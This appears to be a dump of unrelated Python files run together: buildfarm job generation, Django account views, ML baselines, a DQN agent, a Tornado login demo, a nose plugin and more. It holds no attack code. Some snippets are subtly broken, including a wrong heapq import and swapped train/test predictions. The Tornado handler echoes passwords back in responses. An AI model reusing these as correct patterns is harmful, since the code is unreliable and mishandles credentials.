projects.append({
'id': info.id,
'name': info.name,
'description': info.description,
'url': info.url
})
break
req.send(json.dumps(projects), 'application/json')
|
# Copyright 2017 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
from ros_buildfarm.argument import add_argument_config_url
from ros_buildfarm.argument import add_argument_dry_run
from ros_buildfarm.common import get_release_job_prefix
from ros_buildfarm.common import JobValidationError
from ros_buildfarm.config import get_index
from ros_buildfarm.config import get_release_build_files
from ros_buildfarm.jenkins import configure_job
from ros_buildfarm.jenkins import connect
from ros_buildfarm.templates import expand_template
def main(argv=sys.argv[1:]):
parser = argparse.ArgumentParser(
description="Generate the 'upload_main' and 'upload_testing' jobs.")
add_argument_config_url(parser)
add_argument_dry_run(parser)
args = parser.parse_args(argv)
template_name = 'release/trigger_upload_repo_job.xml.em'
config = get_index(args.config_url)
jenkins = connect(config.jenkins_url)
for repo in ['main', 'testing']:
job_name = 'upload_%s' % repo
block_when_upstream_building = 'true'
if repo == 'testing':
block_when_upstream_building = 'false'
job_config = expand_template(template_name, {
'block_when_upstream_building': block_when_upstream_building,
'sync_targets': sorted(get_sync_targets(config, repo)),
'upstream_job_names': get_upstream_job_names(config, repo),
'recipients': config.notify_emails})
configure_job(jenkins, job_name, job_config, dry_run=args.dry_run)
def get_sync_targets(config, repo):
targets = set()
distributions = config.distributions.keys()
for rosdistro in distributions:
build_files = get_release_build_files(config, rosdistro)
for build_file in build_files.values():
for os_name in build_file.targets.keys():
if os_name in ['debian', 'ubuntu']:
targets.add(repo)
else:
targets.add(os_name + '-' + repo)
return targets
def get_upstream_job_names(config, repo):
distributions = config.distributions.keys()
if repo == 'main':
upstream_job_names = ['{0}_sync-packages-to-{1}'.format(
get_release_job_prefix(rosdistro), repo) for rosdistro in distributions]
elif repo == 'testing':
upstream_job_names = []
for rosdistro in distributions:
architectures_by_code_name = {}
build_files = get_release_build_files(config, rosdistro)
for build_file in build_files.values():
for os_name in build_file.targets.keys():
for code_name, architectures in build_file.targets[os_name].items():
architectures_by_code_name[code_name] = \
architectures_by_code_name.get(code_name, set()) | \
set(architectures.keys())
for code_name, archs in architectures_by_code_name.items():
for arch in archs:
upstream_job_names.append(
'{prefix}_sync-packages-to-{repo}_{code_name}_{arch}'.format(
prefix=get_release_job_prefix(rosdistro),
repo=repo,
code_name=code_name,
arch=arch))
else:
raise JobValidationError("Unknown upstream jobs for job 'upload_{}'." % repo)
upstream_job_names.append('import_upstream')
return ','.join(sorted(upstream_job_names))
if __name__ == '__main__':
sys.exit(main())
|
from django.shortcuts import render,redirect
from accounts.forms import (
RegistrationForm,
EditProfileForm
)
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserChangeForm,PasswordChangeForm
from django.contrib.auth import update_session_auth_hash
# from django.contrib.auth.decorators import
from django.views.generic import TemplateView
from django.shortcuts import render
#from accounts.forms import ProfileForm
#from accounts.models import UserProfile
from django.contrib.auth.decorators import login_required
# class ProfileView(TemplateView):
# template_name='accounts/profile.html'
# def get(self,request):
# form=ProfileForm()
# return render(request, self.template_name,{'form':form})
# Create your views here.
def home(request):
numbers = [1,2,3,4,5]
name = 'Milan'
args = {'myName':name, 'numbers':numbers}
return render(request,'accounts/home.html')
def register(request):
if request.method == 'POST':
form = RegistrationForm(request.POST)
if form.is_valid():
form.save()
return redirect('/accounts')
else:
form = RegistrationForm()
args = {'form': form }
return render(request, 'accounts/reg_form.html',args)
# def logout(request):
# auth_logout(request)
# return redirect('/')
@login_required
def view_profile(request):
args = {'user':request.user}
return render(request,'accounts/profile.html',args)
@login_required
def edit_profile(request):
if request.method == "POST":
form = EditProfileForm(request.POST,instance=request.user)
if form.is_valid():
form.save()
return redirect('/accounts/profile')
else:
form = EditProfileForm(instance=request.user)
args = {'form':form}
return render(request,'accounts/edit_profile.html',args)
def change_password(request):
if request.method == "POST":
form = PasswordChangeForm(data=request.POST,user=request.user)
if form.is_valid():
form.save()
update_session_auth_hash(request,form.user)
return redirect('/accounts/profile')
else:
return redirect('accounts/change_password')
else:
form = PasswordChangeForm(user = request.user)
args = {'form':form}
return render(request,'accounts/change_password.html',args)
# def edit_userprofile(request):
# if request.method == 'POST':
# form = UserChangeForm(request.POST) |
# /*
# * Copyright 2018 IBM Corporation
# *
# * Licensed under the Apache License, Version 2.0 (the "License");
# * you may not use this file except in compliance with the License.
# * You may obtain a copy of the License at
# *
# * http://www.apache.org/licenses/LICENSE-2.0
# *
# * Unless required by applicable law or agreed to in writing, software
# * distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
# */
class DeepPPLException(Exception):
pass
class TranslationException(DeepPPLException):
def __init__(self, *args):
msg = self._base_msg.format(*args)
super(TranslationException, self).__init__(msg)
self.msg = msg
self.args = args
def __str__(self):
return self.msg
class MissingPriorNetException(TranslationException):
_base_msg = "The following parameters of {} were not given a prior:{}"
class MissingGuideNetException(TranslationException):
_base_msg = "The following parameters of {} were not given a guide:{}"
class MissingModelException(TranslationException):
_base_msg = "The following latents {} were not sampled on the model."
class MissingGuideException(TranslationException):
_base_msg = "The following latents {} were not sampled on the guide."
class ObserveOnGuideException(TranslationException):
_base_msg = "Trying to observer data {} inside the guide."
class UnsupportedProperty(TranslationException):
_base_msg = "Unsupported property: {}."
class UndeclaredParametersException(TranslationException):
_base_msg = "Use of undeclared parameters: {}."
class UndeclaredNetworkException(TranslationException):
_base_msg = "Use of undeclared network: {}."
class InvalidSamplingException(TranslationException):
_base_msg = "Only identifiers and indexing are supported as lhs of sampling: {}."
class UndeclaredVariableException(TranslationException):
_base_msg = "Undeclared identifier: {}."
class UnknownDistributionException(TranslationException):
_base_msg = "Unknown distribution: {}."
class AlreadyDeclaredException(TranslationException):
_base_msg = "Variable '{}' already declared."
class IncompatibleShapes(TranslationException):
_base_msg = "Trying to use incompatible shapes:{} and {}"
class IncompatibleTypes(TranslationException):
_base_msg = "Trying to unify incompatible types:{} and {}"
class IncompatibleDimensions(IncompatibleTypes):
_base_msg = "Trying to unify incompatible dimensions:{} and {}"
class UnderspecifiedDimension(IncompatibleTypes):
_base_msg = "The dimension of {} could not be inferred ({}) "
class NonRandomSamplingException(TranslationException):
_base_msg = "Invalid sampling statement: '{}'. Trying to sample a non-random variable?"
|
__author__ = 'Julie'
import re,math
wordposPATT=re.compile('(.*)/(.*)')
def untag(wordpos):
matchobj=wordposPATT.match(wordpos)
if matchobj:
(word,pos)=(matchobj.group(1),matchobj.group(2))
return (word,pos)
else:
print "Warning: Does not match word/pos pattern: "+wordpos
return ("","")
def fscore(TP,FP,FN):
if TP+FP==0:
precision = 1
else:
precision = float(TP)/(float(TP)+float(FP))
if TP+FN==0:
recall = 1
else:
recall=float(TP)/(float(TP)+float(FN))
f = 2*precision*recall/(precision+recall)
return(precision,recall,f)
def mymean(list,k):
n=0
total=0
totalsquare=0
#print list
for item in list:
n+=1
total+=float(item)
totalsquare+=float(item)*float(item)
mean = total/n
var = totalsquare/n - mean*mean
if var<0:
print "Warning: negative variance "+str(var)
var=0
sd = math.pow(var,0.5)
int = k*sd/math.pow(len(list),0.5)
return (mean,sd,int)
def f_analyse(actual,results):
#return acc,p,r,f for 2 lists
TP=0
TN=0
FP=0
FN=0
#check lengths the same
if len(actual)!=len(results):
print "Error: two lists not of same length: "+str(len(actual))+", "+str(len(results))
test=0
while len(actual)>0:
test+=1
thisactual=actual.pop()
thisresult=results.pop()
if thisactual==1:
if thisresult==1:
TP+=1
else:
FN+=1
else:
if thisresult==1:
FP+=1
else:
TN+=1
total=TP+FP+TN+FN
if total!=test:
print "Error: number of tests was "+str(test)+" but total is "+str(total)
acc=float(TP+TN)/float(total)
pre=float(TP)/float(TP+FP)
rec=float(TP)/float(TP+FN)
f=2*pre*rec/(pre+rec)
return (acc,pre,rec,f)
if __name__ =="__main__":
a1=[1,1,1,1,0,0,0,0]
r1=[1,1,0,0,1,1,0,0]
print f_analyse(a1,r1) |
#! /usr/bin/env python3
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import datetime
df = pd.read_csv("../data/japandeaths.csv")
t = [datetime.datetime(int(x["年"]), int(x["月"]), 1) for i, x in df.iterrows()]
def days(year, month=None):
year = int(year)
leap = (year % 4 == 0) and (year % 100 != 0) or (year % 400 == 0)
if month is None:
return 365 + leap
else:
month = int(month)
m = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
return m[month - 1] + ((month == 2) and leap)
perday1 = np.array([r[2] / days(r[0], r[1]) for i, r in df.iterrows()]) # 確定数
perday2 = np.array([r[3] / days(r[0], r[1]) for i, r in df.iterrows()]) # 概数
perday3 = np.array([r[4] / days(r[0], r[1]) for i, r in df.iterrows()]) # 速報値
plt.clf()
plt.plot(t, perday1, "o-")
plt.plot(t, perday2, "s-")
plt.plot(t, perday3, "*-")
plt.ylabel("1日あたり死亡数")
plt.legend(["確定数", "概数", "速報値"])
plt.show()
plt.savefig("../img/japandeaths1.svg", bbox_inches="tight")
df["死亡数"] = [n3 if np.isnan(n1) and np.isnan(n2) else n2 if np.isnan(n1) else n1
for n1, n2, n3 in zip(df["確定数"], df["概数"], df["速報値"])]
df["日数"] = [days(year, month) for year, month in zip(df["年"], df["月"])]
plt.clf()
for y in sorted(set(df["年"])):
df1 = df[df["年"] == y]
plt.plot(df1["月"], df1["死亡数"] / df1["日数"],
alpha=0.5, marker=f"${y % 10}$", label=y)
plt.xlabel("月")
plt.ylabel("1日あたり死亡数")
plt.legend(loc=(0.38, 0.60), labelspacing=0.1)
plt.show()
plt.savefig("../img/japandeaths2.svg", bbox_inches="tight")
plt.clf()
for m in range(1, 13):
df1 = df[df["月"] == m]
plt.plot(df1["年"], df1["死亡数"] / df1["日数"], marker=f"${m}$")
plt.ylabel("1日あたり死亡数")
plt.xticks(sorted(set(df["年"] // 2 * 2).intersection(set(df["年"]))))
plt.show()
plt.savefig("../img/japandeaths3.svg", bbox_inches="tight")
exit()
#------
df1 = df.groupby("年")[["死亡数", "日数"]].sum()
df2 = df1[df1.index < 2023]
y = df2.index
x = df2["死亡数"] / df2["日数"]
plt.clf()
plt.plot(y, x, "o-")
plt.xlabel("年")
plt.ylabel("1日あたり死亡数")
plt.xticks(sorted(set(y // 2 * 2).intersection(set(y))))
plt.show()
plt.savefig("../img/japandeaths4.svg", bbox_inches="tight")
u = (2012 <= y) & (y <= 2019)
slope, intercept = np.polyfit(y[u], x[u], 1)
plt.clf()
plt.plot(y, x - (slope * y + intercept), "o-")
plt.axhline(linewidth=0.5, color="black")
plt.xlabel("年")
plt.ylabel("1日あたり超過死亡数")
plt.plot([2020, 2021, 2022], [3459 / 366, (18385 - 3459) / 365, (57266 - 18385) / 365], "o-")
plt.xticks(sorted(set(y // 2 * 2).intersection(set(y))))
plt.show()
plt.savefig("../img/japandeaths5.svg", bbox_inches="tight")
# df3 = df.query("月 <= 4").groupby("年")[["死亡数", "日数"]].sum()
# y = df3.index
# x = df3["死亡数"] / df3["日数"]
# plt.clf()
# plt.plot(y, x, "o-")
# plt.xlabel("年")
# plt.ylabel("1〜4月の1日あたり死亡数")
# plt.xticks(sorted(set(y // 2 * 2).intersection(set(y)))) # 2年ごと
# plt.show()
# plt.savefig("../img/japandeaths6.svg", bbox_inches="tight")
exit()
#------
df = pd.read_csv("https://covid19.mhlw.go.jp/public/opendata/deaths_cumulative_daily.csv",
parse_dates=['Date'])
a = np.arange(np.datetime64("2020-06"), np.datetime64("2023-03"))
da = pd.to_datetime(a)
da1 = da - np.timedelta64(1,"D")
da1s = pd.Series(da1, name='Date')
df2 = pd.merge(da1s, df).diff()
x = df2.ALL / (df2.Date / np.timedelta64(1,"D"))
for i in range(1, len(x)):
print(f"{a[i-1]},{x[i]:3.1f}")
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2018-03-18 02:45
from __future__ import unicode_literals
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='RankedCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=128)),
('normalized_name', models.CharField(max_length=128)),
('total_count', models.IntegerField()),
],
options={
'db_table': 'category_ranks',
'managed': False,
},
),
migrations.CreateModel(
name='Bounty',
fields=[
('id', models.IntegerField(primary_key=True, serialize=False)),
('bounty_id', models.IntegerField()),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('deadline', models.DateTimeField()),
('data', models.CharField(max_length=128)),
('issuer', models.CharField(max_length=128)),
('arbiter', models.CharField(max_length=128, null=True)),
('fulfillmentAmount', models.DecimalField(decimal_places=0, max_digits=64)),
('paysTokens', models.BooleanField()),
('bountyStage', models.IntegerField(choices=[(0, 'Draft'), (1, 'Active'), (2, 'Dead'), (3, 'Completed'), (4, 'Expired')], default=0)),
('old_balance', models.DecimalField(decimal_places=0, max_digits=64, null=True)),
('balance', models.DecimalField(decimal_places=0, default=0, max_digits=70, null=True)),
('title', models.CharField(blank=True, max_length=256)),
('description', models.TextField(blank=True)),
('bounty_created', models.DateTimeField(null=True)),
('tokenSymbol', models.CharField(default='ETH', max_length=128)),
('tokenDecimals', models.IntegerField(default=18)),
('tokenContract', models.CharField(default='0x0000000000000000000000000000000000000000', max_length=128)),
('usd_price', models.FloatField(default=0)),
('issuer_name', models.CharField(blank=True, max_length=128)),
('issuer_email', models.CharField(blank=True, max_length=128)),
('issuer_githubUsername', models.CharField(blank=True, max_length=128)),
('issuer_address', models.CharField(blank=True, max_length=128)),
('sourceFileName', models.CharField(blank=True, max_length=256)),
('sourceFileHash', models.CharField(blank=True, max_length=256)),
('sourceDirectoryHash', models.CharField(blank=True, max_length=256)),
('webReferenceUrl', models.CharField(blank=True, max_length=256)),
('platform', models.CharField(blank=True, max_length=128)),
('schemaVersion', models.CharField(blank=True, max_length=64)),
('schemaName', models.CharField(max_length=128, null=True)),
('data_categories', django.contrib.postgres.fields.jsonb.JSONField(null=True)),
('data_issuer', django.contrib.postgres.fields.jsonb.JSONField(null=True)),
('data_json', django.contrib.postgres.fields.jsonb.JSONField(null=True)),
],
),
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=128, unique=True)),
('normalized_name', models.CharField(max_length=128)),
],
),
migrations.CreateModel(
name='Fulfillment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fulfillment_id', models.IntegerField()),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('fulfillment_created', models.DateTimeField(null=True)),
('data', models.CharField(max_length=128)),
('accepted', models.BooleanField()),
('fulfiller', models.CharField(max_length=128)),
('fulfiller_name', models.CharField(blank=True, max_length=128)),
('fulfiller_email', models.CharField(blank=True, max_length=128)),
('fulfiller_githubUsername', models.CharField(blank=True, max_length=128)),
('fulfiller_address', models.CharField(blank=True, max_length=128)),
('description', models.TextField(blank=True)),
('sourceFileName', models.CharField(blank=True, max_length=256)),
('sourceFileHash', models.CharField(blank=True, max_length=256)),
('sourceDirectoryHash', models.CharField(blank=True, max_length=256)),
('platform', models.CharField(blank=True, max_length=128)),
('schemaVersion', models.CharField(blank=True, max_length=64)),
('schemaName', models.CharField(blank=True, max_length=128)),
('data_fulfiller', django.contrib.postgres.fields.jsonb.JSONField(null=True)),
('data_json', django.contrib.postgres.fields.jsonb.JSONField(null=True)),
('bounty', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='fulfillments', to='std_bounties.Bounty')),
],
),
migrations.CreateModel(
name='Token',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('normalized_name', models.CharField(max_length=128)),
('name', models.CharField(max_length=128)),
('symbol', models.CharField(max_length=128)),
('price_usd', models.FloatField(default=0, null=True)),
],
),
migrations.AddField(
model_name='bounty',
name='categories',
field=models.ManyToManyField(null=True, to='std_bounties.Category'),
),
migrations.AddField(
model_name='bounty',
name='token',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='std_bounties.Token'),
),
]
|
import numpy as np
import pandas as pd
from sklearn.metrics import accuracy_score, roc_curve, confusion_matrix
from sklearn.utils import shuffle
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB, BernoulliNB
import models
from data.utils import load_sparse_csr, generate_folder
MODELS = [ ('Logistic Regression', LogisticRegression), ('NaiveBayes-Bernoulli', BernoulliNB), ('NaiveBayes-Gaussian', GaussianNB) ]
results = {}
for (FOLDER, folder_title) in generate_folder('./data', folder_titles=True):
X_train = load_sparse_csr(FOLDER+'X_train.csr.npz')
Y_train = np.load(FOLDER+'Y_train.npy')
X_test = load_sparse_csr(FOLDER+'X_test.csr.npz')
Y_test = np.load(FOLDER+'Y_test.npy')
# shuffle:
X_train, Y_train = shuffle(X_train, Y_train)
# need to convert back from sparse because gaussianNB doesn't accept this
X_train = X_train.toarray()
X_test = X_test.toarray()
results[folder_title + '(train)'] = {}
results[folder_title + '(test)'] = {}
for (model_name, model) in MODELS:
print('Model: '+model_name)
print('Features:'+FOLDER)
#fit the model
m = model()
m.fit(X_train, Y_train)
Y_train_pred = m.predict(X_test)
Y_test_pred = m.predict(X_train)
print('Training Accuracy:')
train_acc = m.score(X_train, Y_train)
print(train_acc)
print('Testing Accuracy:')
test_acc = m.score(X_test, Y_test)
print(test_acc)
results[folder_title + '(train)'][model_name] = train_acc
results[folder_title + '(test)'][model_name] = test_acc
# print('Training Confusion')
# print(confusion_matrix(m.predict(X_train), Y_train))
# print('Testing Confusion')
# print(confusion_matrix(m.predict(X_test), Y_test))
pd.DataFrame(results).to_pickle('./baseline_results.pickle') |
#encoding=utf-8
import tornado.web
import tornado.ioloop
from tornado.escape import json_encode
class IndexHandler(tornado.web.RequestHandler):
def get(self,*args,**kwargs):
self.render('templates\login.html')
class LoginHandler(tornado.web.RequestHandler):
def get(self,*args,**kwargs):
name=self.get_argument('name')
pwd=self.get_argument('pwd')
user=[name,pwd]
self.write(json_encode(user))
def post(self,*args,**kwargs):
name=self.get_body_argument('name')
pwd=self.get_body_argument('pwd')
user=[name,pwd]
self.write(json_encode(user))
app = tornado.web.Application([
(r'^/$',IndexHandler),
(r'^/login/$',LoginHandler),
])
app.listen(8888)
tornado.ioloop.IOLoop.instance().start()
|
from anoky.syntax.form import Form
from anoky.syntax.node import Element
from anoky.syntax.util import is_identifier, identifier_in
from anoky.transducers.arrangement_rule import ArrangementRule
class RightLeftBinaryOperator(ArrangementRule):
"""
::
⋅ ⦅X a b⦆ a ⋅ X b
"""
def __init__(self, sym_vals):
ArrangementRule.__init__(self, "Left-Right Binary Operator")
self.sym_vals = sym_vals
def applies(self, element:Element):
return (
is_identifier(element.code) and
identifier_in(element.code, self.sym_vals) and
not element.is_first() and
not element.is_last()
)
def apply(self, element):
form = element.parent
p = element.prev
n = element.next
form.remove(p)
form.remove(n)
new_form = Form(element.code, p, n)
new_form_element = form.replace(element, new_form)
return new_form_element.prev |
from lib.Storage import Storage
from utils import Transmitter, Singleton, Worker
class StorageManager(metaclass=Singleton):
def __init__(self):
self.__transmitter = Transmitter(StorageWorker)
self.__health_monitor = None
def start(self):
self.__transmitter.start()
# self.__health_monitor.start()
def stop(self):
self.__transmitter.stop()
# self.__health_monitor.stop()
class StorageWorker(Worker, metaclass=Singleton):
def __init__(self):
file_system_worker = Storage()
file_system_worker.start()
super().__init__(tcp_worker=file_system_worker, udp_worker=None)
def run(self, _, data, address):
self._tcp_worker.execute(data, address)
def stop(self):
self._tcp_worker.stop()
|
# Generated by Django 3.1 on 2020-11-09 05:45
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('app1', '0009_auto_20201107_2123'),
('app1', '0008_booking_booking_date'),
]
operations = [
]
|
from tensorboard_logger import Logger
logger = Logger(logdir='experiment_cnn', flush_secs=2)
for i in range(100):
logger.log_value('loss', 10-i**0.5, step=i)
logger.log_value('accuracy', i**0.5/10) |
import sympy as sp
import numpy as np
# from sympy import cos, sin, exp
# CC: is this above line useful here ?
t = sp.Symbol("t")
class Boundary:
"""
Defines the class Boundary, that contains geometric features of a boundary
Attributes
==========
param: parametrization of a boundary
veloc: derivative of the parametrization
accel: second derivative of the parametrization
normal: normal vector to the boundary
tangent: tangent vectors to the boundary
curvature: signed curvature of the boundary
jacobian: Jacobian of the boundary
"""
def __init__(self, b):
self.y = b
@property
def yp(self):
return [sp.diff(p, t) for p in self.y]
@property
def ypp(self):
return [sp.diff(p, t) for p in self.yp]
@property
def J(self):
v2 = [i ** 2 for i in self.yp]
sv2 = sum(v2)
return sp.sqrt(sv2).simplify()
@property
def τ(self):
return [p / self.J for p in self.yp]
@property
def ν(self):
if len(self.y) == 2:
tmp = (self.yp[1] / self.J, -self.yp[0] / self.J)
return tmp
else:
raise ValueError("Need to define the normal vector for higher dimensions")
@property
def κ(self): # curvature kappa
if len(self.y) == 2:
tmp = (self.yp[0] * self.ypp[1] - self.yp[1] * self.ypp[0]) / self.J ** 3
return tmp.simplify()
else:
raise ValueError("Need to define the mean curvature for higher dimensions")
def items(self): # all elements of the class
list_elem = ["y", "yp", "ypp", "J", "τ", "ν", "κ"]
return [getattr(self, p) for p in list_elem]
def items_lambdified(self): # lambdified all elements
return [sp.lambdify(t, p) for p in self.items()]
def lclassB(B):
"""
Lambdify the Boundary class with specific attributes
Parameters
==========
cls: Boundary class
Returns
==========
cls: Boundary class lambdified
"""
attributes = ["y", "yp", "ypp", "J", "τ", "ν", "κ"]
for a in attributes:
symbolic = getattr(B, a)
lam = np.vectorize(sp.lambdify(t, symbolic))
setattr(B, a + "_l", lam)
return B
|
from heapq import heapq
class Solution:
def minMeetingRooms(self, intervals: List[List[int]]) -> int:
"""
Purpose: Returns the min. no. of conference rooms required, given an array
of meeting time `intervals` where intervals[i] = [start_i, end_i].
"""
if not intervals: return 0
free_rooms = []
intervals.sort(key= lambda x: x[0])
heapq.heappush(free_rooms, intervals[0][1])
for interval in intervals[1:]:
if free_rooms[0] <= interval[0]:
heapq.heappop(free_rooms)
heapq.heappush(free_rooms, interval[1])
return len(free_rooms) |
from prac_06.guitar import Guitar
gibson = Guitar("Gibson L-5 CES", 1922, 16035.40)
print(gibson.get_age()) # Expected answer is 98
print(gibson.is_vintage()) # Expected answer is True |
import random
import numpy as np
class Agent(object):
def __init__(self, env, net, args):
self.env = env
self.net = net
# Training epsilon
self.exploration_rate_start = args.exploration_rate_start
self.exploration_rate_end = args.exploration_rate_end
self.exploration_rate_test = args.exploration_rate_test
self.exploration_decay_steps = args.exploration_decay_steps
self.exploration_decay = (args.exploration_rate_start - args.exploration_rate_end) / args.exploration_decay_steps
self.total_train_steps = 0
self.train_frequency = args.train_frequency
self.train_repeat = args.train_repeat
self.target_steps = args.target_steps
self.random_starts = args.random_starts
self.history_length = args.history_length
# Statistics
self.callback = None
def _epsilon(self):
if self.total_train_steps < self.exploration_decay_steps:
return self.exploration_rate_start - self.total_train_steps * self.exploration_decay
else:
return self.exploration_rate_end
def _reset_random(self):
# Reset environment
self.env.reset()
# Perform random number of dummy actions to produce more stochastic games
for _ in range(random.randint(self.history_length, self.random_starts) + 1):
noop = 0
screen, reward, terminal = self.env.step(noop)
if terminal:
self.env.restart()
# Add dummy states to buffer
self.net.remember(noop, reward, screen, terminal, training=False)
def _step(self, exploration_rate, action_b=0, training=True):
# Predict action
action = self.net.forward(exploration_rate)
# Execute action on environment
screen, reward, terminal = self.env.step(action, action_b)
# Save current data to memory and buffer
self.net.remember(action, reward, screen, terminal, training=training)
# Reset after terminal state
if terminal:
# Reset environment
self._reset_random()
# Calculate statistics
if self.callback:
self.callback.on_step(action, reward, terminal, screen, exploration_rate)
return action, reward, terminal, screen
def play_random(self, random_steps):
# Reset environment
self.env.reset()
# Play given number of steps
for _ in range(random_steps):
# Do random action
_, _, _, _ = self._step(1)
def train(self, train_steps):
# Reset environment
self._reset_random()
total_reward = 0.0
# Train for given number of steps
for i in range(train_steps):
# Count current step
self.total_train_steps += 1
# Execute step on agent
_, reward, terminal, _ = self._step(self._epsilon())
total_reward += reward
# Update target model
if self.target_steps >= 1 and i % self.target_steps == 0:
self.net.update_target_model()
# Train network
if i % self.train_frequency == 0:
for _ in range(self.train_repeat):
self.net.backward()
# Print results on terminal state
if terminal:
print("Train episode ended with score: " + str(total_reward) + " on step " + str(self.total_train_steps))
total_reward = 0.0
def test(self, test_steps):
# Reset environment
self._reset_random()
total_reward = 0.0
# Test for given number of steps
for _ in range(test_steps):
# Execute step on agent
_, reward, terminal, _ = self._step(self.exploration_rate_test, training=False)
total_reward += reward
# Print results on terminal state
if terminal:
print("Test episode ended with score: " + str(total_reward))
total_reward = 0.0
def play(self):
# Reset environment
self._reset_random()
terminal = False
total_reward = 0.0
while not terminal:
# Execute step on agent
_, reward, terminal, _ = self._step(self.exploration_rate_test, training=False)
total_reward += reward
# Print results
print("Play episode ended with score: " + str(total_reward))
def play_two_players(self, player_b):
# Reset environment
self._reset_random()
terminal = False
total_reward = 0.0
while not terminal:
# Get action from player
action_b = player_b.get_action()
# End play if user wants to exit
if action_b == -1:
break
# Execute step on agent
_, reward, terminal, _ = self._step(self.exploration_rate_test, action_b=action_b, training=False)
total_reward += reward
# Get image from emulator and render it to user
screen = self.env.ale.getScreenRGB()
player_b.render_screen(screen)
# Print results
print("2-player episode ended with score: " + str(total_reward))
|
from nose.plugins.errorclass import ErrorClass, ErrorClassPlugin
from nose.tools import make_decorator
class Todo(Exception):
"""The `Exception` raised when a to-do test fails as expected.
These results are not counted as errors in the test suite results.
"""
pass
class MoreTodo(ErrorClassPlugin):
"""A nose plugin adding "to-do" tests in the style of Perl's Test::More.
There are several nose plugins for adding to-do tests (including the
`ErrorClassPlugin` example in the nose documentation). Unlike most of them,
`MoreTodo` also treats the *unexpected success* of a to-do test as a
failure. That is, tests that are marked to-do *must* fail.
To use the plugin, mark your to-do tests with the included
`moretodo.todo()` decorator::
from moretodo import todo
class MyTests(unittest.TestCase):
@todo
def test_something_broken(self):
raise NotImplementedError
When such a test fails by raising any exception (including `AssertionError`
exceptions from the `TestCase.assert*` methods), it will be counted as a
non-error ``TODO`` test in the test suite results. If, however, your test
succeeds, the `todo` decorator will raise a real `AssertionError`, counting
your test among the suite's failed tests.
"""
enabled = True
todo = ErrorClass(Todo, label='TODO', isfailure=False)
def options(self, parser, env):
"""Configures this nose plugin's options.
This implementation adds a ``--do-all`` parameter that, when specified,
disables the to-do plugin. A true value in the environment variable
``NOSE_WITHOUT_TODO`` also disables the plugin.
"""
env_opt = 'NOSE_WITHOUT_TODO'
parser.add_option('--do-all', action='store_true',
dest='no_todo', default=env.get(env_opt, False),
help='Run all to-do tests as normal tests instead. '
'[NOSE_WITHOUT_TODO]')
def configure(self, options, conf):
"""Configures this nose plugin per the specified options.
If the `no_todo` option was specified (either through the ``--do-all``
command line argument or the ``NOSE_WITHOUT_TODO`` environment
variable), to-do behavior will be disabled and tests will run normally.
"""
if not self.can_configure:
return
self.conf = conf
disable = getattr(options, 'no_todo', False)
if disable:
# Set it on the class, so our class method will know.
type(self).enabled = False
@classmethod
def run_test(cls, fn, args, kwargs):
"""Runs the given test `fn` with the given positional and keyword
arguments.
If to-do tests are enabled, failures will be transmuted into
expected-failure successes, while real successes will become
unexpected-success failures.
"""
if not cls.enabled:
return fn(*args, **kwargs)
try:
fn(*args, **kwargs)
except Exception, exc:
raise Todo('Caught expected failure %s: %s' % (type(exc).__name__, str(exc)))
else:
raise AssertionError('Test unexpectedly passed')
def todo(fn):
"""Marks a test as a to-do test.
To-do tests are expected to fail. If a test marked with this decorator
fails, it will be marked as an expected failure in the test results;
contrariwise, if the test succeeds, it will be reported as a fatal
"unexpected success" failure.
"""
@make_decorator(fn)
def run_test(*args, **kwargs):
return MoreTodo.run_test(fn, args, kwargs)
return run_test
|
import meshio
import Optimization_w_CS as ocs
import numpy as np
PATH = '/home/mltn/Documents/Meshes/Basicmodels/Simplest/bigger/'
# bound = 'bdata_m1.txt'
names = ['tet.vtk', 'otet_m1.vtk']
mesh = meshio.read(PATH+names[0])
points = mesh.points
# print len(points)
el = mesh.cells['tetra']
# print len(el)
vn, eln = ocs.connection_mapping(el)
vars = np.arange(0,len(points)+1,1)
cons = ocs.Con(vn, eln, el, vars)
indexes = cons.get_indexes()
node = ocs.build_node_objects(points, vars, {})
devs = ocs.quality_control(node,cons)
# print len(devs), indexes
max_dev = np.zeros(len(el))
min_dev = np.ones(len(el))
avg_dev_num = np.zeros(len(el))
avg_dev_count = np.zeros(len(el))
i_ind = 0
for i_dev, dev in enumerate(devs):
while len(indexes[i_ind]) < 2:
i_ind += 1
for index in indexes[i_ind]:
# print index
if max_dev[index] < dev:
max_dev[index] = dev
if min_dev[index] > dev:
min_dev[index] = dev
avg_dev_num[index] += dev
avg_dev_count[index] += 1
i_ind += 1
zeros = 0
for count in avg_dev_count:
if count == 0:
zeros += 1
print zeros
avg_dev = np.zeros(len(el))
for ind, num in enumerate(avg_dev_num):
avg_dev[ind] = num/avg_dev_count[ind]
mesh.cell_data['tetra']['max_dev'] = max_dev
